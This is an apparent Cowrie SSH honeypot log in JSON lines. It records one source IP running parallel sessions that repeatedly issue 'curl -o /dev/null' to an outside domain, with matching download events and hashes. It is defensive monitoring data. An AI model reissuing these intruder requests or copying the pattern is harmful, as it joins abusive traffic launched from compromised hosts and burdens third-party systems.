{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:19.968358Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.002068Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.002957Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.005952Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.008421Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.011028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.012040Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.012743Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.015551Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.018133Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.053761Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.054718Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.058304Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.058988Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.065084Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.065730Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.096775Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.098825Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.100036Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.101037Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.103801Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.104776Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.109969Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.110444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.142367Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.143504Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.143965Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.147110Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.147778Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.149320Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.150028Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.154528Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.182558Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.184813Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.186596Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.187142Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.190862Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.194274Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.197902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.198840Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.200901Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.201476Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.227761Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.229073Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.229686Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.232976Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.237472Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.238784Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.244217Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.245777Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.246502Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.273241Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.275695Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.277718Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.278734Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.283569Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.288452Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.289128Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.291152Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.291914Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.325161Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.327543Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.329944Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.330873Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.337240Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.337847Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.339913Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.340764Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.345625Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.375947Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.376779Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.380575Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.406959Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.411308Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.412553Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.413539Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.434155Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.435016Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.445651Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.457930Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.458721Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
